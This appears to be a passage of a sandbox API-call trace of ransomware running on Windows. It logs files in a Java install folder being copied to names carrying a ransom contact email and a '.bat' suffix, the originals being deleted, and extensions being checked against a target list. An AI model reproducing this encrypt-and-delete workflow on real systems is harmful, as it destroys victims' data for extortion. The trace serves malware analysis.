[0200.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll")) returned 0x20 [0200.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0200.627] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0200.627] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.627] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.628] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0200.628] GetLastError () returned 0x0 [0200.628] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x2f040, lpOverlapped=0x0) returned 1 [0201.649] WriteFile (in: hFile=0x364, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x2f050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x2f050, lpOverlapped=0x0) returned 1 [0201.653] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.653] WriteFile (in: hFile=0x364, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xec, lpOverlapped=0x0) returned 1 [0201.654] SetEndOfFile (hFile=0x364) returned 1 [0201.654] CloseHandle (hObject=0x364) returned 1 [0201.654] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.654] SetEndOfFile (hFile=0x3a8) returned 1 [0201.656] CloseHandle (hObject=0x3a8) returned 1 [0201.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.656] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll")) returned 1 [0201.657] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.657] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.657] lstrlenW (lpString=".doc") returned 4 [0201.657] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.657] lstrlenW (lpString=".docx") returned 5 [0201.657] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0201.657] lstrlenW (lpString=".pdf") returned 4 [0201.657] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.657] lstrlenW (lpString=".xls") returned 4 [0201.657] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.657] lstrlenW (lpString=".xlsx") returned 5 [0201.657] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0201.657] lstrlenW (lpString=".ppt") returned 4 [0201.657] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.657] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.657] lstrlenW (lpString=".zip") returned 4 [0201.657] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.657] lstrlenW (lpString=".rar") returned 4 [0201.657] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.657] lstrlenW (lpString=".bz2") returned 4 [0201.657] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.657] lstrlenW (lpString=".7z") returned 3 [0201.657] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.657] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.657] lstrlenW (lpString=".dbf") returned 4 [0201.657] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.657] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.657] lstrlenW (lpString=".1cd") returned 4 [0201.657] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.657] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.657] lstrlenW (lpString=".jpg") returned 4 [0201.658] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.658] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.658] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.658] lstrlenW (lpString=".doc") returned 4 [0201.658] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.658] lstrlenW (lpString=".docx") returned 5 [0201.658] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0201.658] lstrlenW (lpString=".pdf") returned 4 [0201.658] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.658] lstrlenW (lpString=".xls") returned 4 [0201.658] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.658] lstrlenW (lpString=".xlsx") returned 5 [0201.658] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0201.658] lstrlenW (lpString=".ppt") returned 4 [0201.658] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.658] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.658] lstrlenW (lpString=".zip") returned 4 [0201.658] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.658] lstrlenW (lpString=".rar") returned 4 [0201.658] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.658] lstrlenW (lpString=".bz2") returned 4 [0201.658] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.658] lstrlenW (lpString=".7z") returned 3 [0201.658] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.658] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.658] lstrlenW (lpString=".dbf") returned 4 [0201.658] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.658] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.659] lstrlenW (lpString=".1cd") returned 4 [0201.659] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.659] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 51 [0201.659] lstrlenW (lpString=".jpg") returned 4 [0201.659] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.659] lstrcmpiW (lpString1=".0_144\\COPYRIGHT", lpString2=".bat") returned -1 [0201.659] lstrlenW (lpString="COPYRIGHT") returned 9 [0201.659] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.659] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=3244) returned 1 [0201.659] CloseHandle (hObject=0x3a8) returned 1 [0201.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright")) returned 0x20 [0201.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.660] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.660] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.660] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.660] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0201.660] GetLastError () returned 0x0 [0201.660] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xcac, lpOverlapped=0x0) returned 1 [0201.749] WriteFile (in: hFile=0x364, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xcb0, lpOverlapped=0x0) returned 1 [0201.751] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.751] WriteFile (in: hFile=0x364, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe6, lpOverlapped=0x0) returned 1 [0201.751] SetEndOfFile (hFile=0x364) returned 1 [0201.751] CloseHandle (hObject=0x364) returned 1 [0201.751] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.751] SetEndOfFile (hFile=0x3a8) returned 1 [0201.752] CloseHandle (hObject=0x3a8) returned 1 [0201.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.753] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright")) returned 1 [0201.753] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.753] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.753] lstrlenW (lpString=".doc") returned 4 [0201.753] lstrcmpiW (lpString1=".doc", lpString2="IGHT") returned -1 [0201.753] lstrlenW (lpString=".docx") returned 5 [0201.753] lstrcmpiW (lpString1=".docx", lpString2="RIGHT") returned -1 [0201.753] lstrlenW (lpString=".pdf") returned 4 [0201.753] lstrcmpiW (lpString1=".pdf", lpString2="IGHT") returned -1 [0201.753] lstrlenW (lpString=".xls") returned 4 [0201.753] lstrcmpiW (lpString1=".xls", lpString2="IGHT") returned -1 [0201.753] lstrlenW (lpString=".xlsx") returned 5 [0201.753] lstrcmpiW (lpString1=".xlsx", lpString2="RIGHT") returned -1 [0201.753] lstrlenW (lpString=".ppt") returned 4 [0201.753] lstrcmpiW (lpString1=".ppt", lpString2="IGHT") returned -1 [0201.753] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.753] lstrlenW (lpString=".zip") returned 4 [0201.753] lstrcmpiW (lpString1=".zip", lpString2="IGHT") returned -1 [0201.753] lstrlenW (lpString=".rar") returned 4 [0201.754] lstrcmpiW (lpString1=".rar", lpString2="IGHT") returned -1 [0201.754] lstrlenW (lpString=".bz2") returned 4 [0201.754] lstrcmpiW (lpString1=".bz2", lpString2="IGHT") returned -1 [0201.754] lstrlenW (lpString=".7z") returned 3 [0201.754] lstrcmpiW (lpString1=".7z", lpString2="GHT") returned -1 [0201.754] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.754] lstrlenW (lpString=".dbf") returned 4 [0201.754] lstrcmpiW (lpString1=".dbf", lpString2="IGHT") returned -1 [0201.754] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.754] lstrlenW (lpString=".1cd") returned 4 [0201.754] lstrcmpiW (lpString1=".1cd", lpString2="IGHT") returned -1 [0201.754] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.754] lstrlenW (lpString=".jpg") returned 4 [0201.754] lstrcmpiW (lpString1=".jpg", lpString2="IGHT") returned -1 [0201.754] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.754] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.754] lstrlenW (lpString=".doc") returned 4 [0201.754] lstrcmpiW (lpString1=".doc", lpString2="IGHT") returned -1 [0201.754] lstrlenW (lpString=".docx") returned 5 [0201.754] lstrcmpiW (lpString1=".docx", lpString2="RIGHT") returned -1 [0201.754] lstrlenW (lpString=".pdf") returned 4 [0201.754] lstrcmpiW (lpString1=".pdf", lpString2="IGHT") returned -1 [0201.754] lstrlenW (lpString=".xls") returned 4 [0201.754] lstrcmpiW (lpString1=".xls", lpString2="IGHT") returned -1 [0201.754] lstrlenW (lpString=".xlsx") returned 5 [0201.754] lstrcmpiW (lpString1=".xlsx", lpString2="RIGHT") returned -1 [0201.754] lstrlenW (lpString=".ppt") returned 4 [0201.755] lstrcmpiW (lpString1=".ppt", lpString2="IGHT") returned -1 [0201.755] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.755] lstrlenW (lpString=".zip") returned 4 [0201.755] lstrcmpiW (lpString1=".zip", lpString2="IGHT") returned -1 [0201.755] lstrlenW (lpString=".rar") returned 4 [0201.755] lstrcmpiW (lpString1=".rar", lpString2="IGHT") returned -1 [0201.755] lstrlenW (lpString=".bz2") returned 4 [0201.755] lstrcmpiW (lpString1=".bz2", lpString2="IGHT") returned -1 [0201.755] lstrlenW (lpString=".7z") returned 3 [0201.755] lstrcmpiW (lpString1=".7z", lpString2="GHT") returned -1 [0201.755] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.755] lstrlenW (lpString=".dbf") returned 4 [0201.755] lstrcmpiW (lpString1=".dbf", lpString2="IGHT") returned -1 [0201.755] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.755] lstrlenW (lpString=".1cd") returned 4 [0201.755] lstrcmpiW (lpString1=".1cd", lpString2="IGHT") returned -1 [0201.755] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0201.755] lstrlenW (lpString=".jpg") returned 4 [0201.755] lstrcmpiW (lpString1=".jpg", lpString2="IGHT") returned -1 [0201.755] lstrcmpiW (lpString1=".pf", lpString2=".bat") returned 1 [0201.755] lstrlenW (lpString="CIEXYZ.pf") returned 9 [0201.755] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.756] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=51236) returned 1 [0201.756] CloseHandle (hObject=0x3a8) returned 1 [0201.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf")) returned 0x20 [0201.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.759] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.759] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.759] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.759] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.820] GetLastError () returned 0x0 [0201.820] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xc824, lpOverlapped=0x0) returned 1 [0201.901] WriteFile (in: hFile=0x344, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xc830, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xc830, lpOverlapped=0x0) returned 1 [0201.903] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.903] WriteFile (in: hFile=0x344, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe6, lpOverlapped=0x0) returned 1 [0201.903] SetEndOfFile (hFile=0x344) returned 1 [0201.903] CloseHandle (hObject=0x344) returned 1 [0201.903] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.903] SetEndOfFile (hFile=0x3a8) returned 1 [0201.904] CloseHandle (hObject=0x3a8) returned 1 [0201.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.905] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf")) returned 1 [0201.905] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.905] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.905] lstrlenW (lpString=".doc") returned 4 [0201.905] lstrcmpiW (lpString1=".doc", lpString2="Z.pf") returned -1 [0201.905] lstrlenW (lpString=".docx") returned 5 [0201.905] lstrcmpiW (lpString1=".docx", lpString2="YZ.pf") returned -1 [0201.905] lstrlenW (lpString=".pdf") returned 4 [0201.905] lstrcmpiW (lpString1=".pdf", lpString2="Z.pf") returned -1 [0201.905] lstrlenW (lpString=".xls") returned 4 [0201.905] lstrcmpiW (lpString1=".xls", lpString2="Z.pf") returned -1 [0201.905] lstrlenW (lpString=".xlsx") returned 5 [0201.905] lstrcmpiW (lpString1=".xlsx", lpString2="YZ.pf") returned -1 [0201.905] lstrlenW (lpString=".ppt") returned 4 [0201.905] lstrcmpiW (lpString1=".ppt", lpString2="Z.pf") returned -1 [0201.905] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.905] lstrlenW (lpString=".zip") returned 4 [0201.905] lstrcmpiW (lpString1=".zip", lpString2="Z.pf") returned -1 [0201.905] lstrlenW (lpString=".rar") returned 4 [0201.906] lstrcmpiW (lpString1=".rar", lpString2="Z.pf") returned -1 [0201.906] lstrlenW (lpString=".bz2") returned 4 [0201.906] lstrcmpiW (lpString1=".bz2", lpString2="Z.pf") returned -1 [0201.906] lstrlenW (lpString=".7z") returned 3 [0201.906] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0201.906] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.906] lstrlenW (lpString=".dbf") returned 4 [0201.906] lstrcmpiW (lpString1=".dbf", lpString2="Z.pf") returned -1 [0201.906] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.906] lstrlenW (lpString=".1cd") returned 4 [0201.906] lstrcmpiW (lpString1=".1cd", lpString2="Z.pf") returned -1 [0201.906] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.906] lstrlenW (lpString=".jpg") returned 4 [0201.906] lstrcmpiW (lpString1=".jpg", lpString2="Z.pf") returned -1 [0201.906] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.906] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.906] lstrlenW (lpString=".doc") returned 4 [0201.906] lstrcmpiW (lpString1=".doc", lpString2="Z.pf") returned -1 [0201.906] lstrlenW (lpString=".docx") returned 5 [0201.906] lstrcmpiW (lpString1=".docx", lpString2="YZ.pf") returned -1 [0201.906] lstrlenW (lpString=".pdf") returned 4 [0201.906] lstrcmpiW (lpString1=".pdf", lpString2="Z.pf") returned -1 [0201.906] lstrlenW (lpString=".xls") returned 4 [0201.906] lstrcmpiW (lpString1=".xls", lpString2="Z.pf") returned -1 [0201.906] lstrlenW (lpString=".xlsx") returned 5 [0201.906] lstrcmpiW (lpString1=".xlsx", lpString2="YZ.pf") returned -1 [0201.906] lstrlenW (lpString=".ppt") returned 4 [0201.907] lstrcmpiW (lpString1=".ppt", lpString2="Z.pf") returned -1 [0201.907] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.907] lstrlenW (lpString=".zip") returned 4 [0201.907] lstrcmpiW (lpString1=".zip", lpString2="Z.pf") returned -1 [0201.907] lstrlenW (lpString=".rar") returned 4 [0201.907] lstrcmpiW (lpString1=".rar", lpString2="Z.pf") returned -1 [0201.907] lstrlenW (lpString=".bz2") returned 4 [0201.907] lstrcmpiW (lpString1=".bz2", lpString2="Z.pf") returned -1 [0201.907] lstrlenW (lpString=".7z") returned 3 [0201.907] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0201.907] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.907] lstrlenW (lpString=".dbf") returned 4 [0201.907] lstrcmpiW (lpString1=".dbf", lpString2="Z.pf") returned -1 [0201.907] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.907] lstrlenW (lpString=".1cd") returned 4 [0201.907] lstrcmpiW (lpString1=".1cd", lpString2="Z.pf") returned -1 [0201.907] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0201.907] lstrlenW (lpString=".jpg") returned 4 [0201.907] lstrcmpiW (lpString1=".jpg", lpString2="Z.pf") returned -1 [0201.907] lstrcmpiW (lpString1=".pf", lpString2=".bat") returned 1 [0201.907] lstrlenW (lpString="LINEAR_RGB.pf") returned 13 [0201.907] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.908] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=1044) returned 1 [0201.908] CloseHandle (hObject=0x3a8) returned 1 [0201.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf")) returned 0x20 [0201.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.908] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.908] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.909] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 